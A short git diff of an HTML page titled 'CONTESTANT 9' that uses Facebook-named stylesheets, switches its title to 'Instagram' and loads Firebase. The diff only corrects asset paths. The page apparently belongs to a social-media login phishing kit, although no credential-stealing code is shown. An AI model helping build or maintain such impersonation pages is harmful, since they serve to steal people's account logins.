--- a/9/index.html
+++ b/9/index.html
@@ -6,7 +6,7 @@
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <!--metatextblock-->
     <title>CONTESTANT 9</title>
-    <link id="dynamic-favicon" href="assets/favicon.png" rel="shortcut icon" sizes="196x196">
+    <link id="dynamic-favicon" href="/assets/favicon.ico" rel="shortcut icon" sizes="196x196">
     <link type="text/css" rel="stylesheet" href="/css/fb.css">
     <link type="text/css" rel="stylesheet" href="/css/fb_style.css">
     <link type="text/css" rel="stylesheet" href="/css/page.css">
@@ -3713,7 +3713,6 @@
             document.title = 'Instagram';
 
         }
-
     </script>
 
     <!--Firebase-->
@@ -3724,7 +3723,7 @@
     <script src="https://www.gstatic.com/firebasejs/5.8.1/firebase.js"></script>
     <script src="https://raw.githubusercontent.com/firebase/firebase-bower/master/firebase-app-check.js.map"></script>
 
-    <script src="js/firebase.js">
+    <script src="/js/firebase.js">
 
 
 
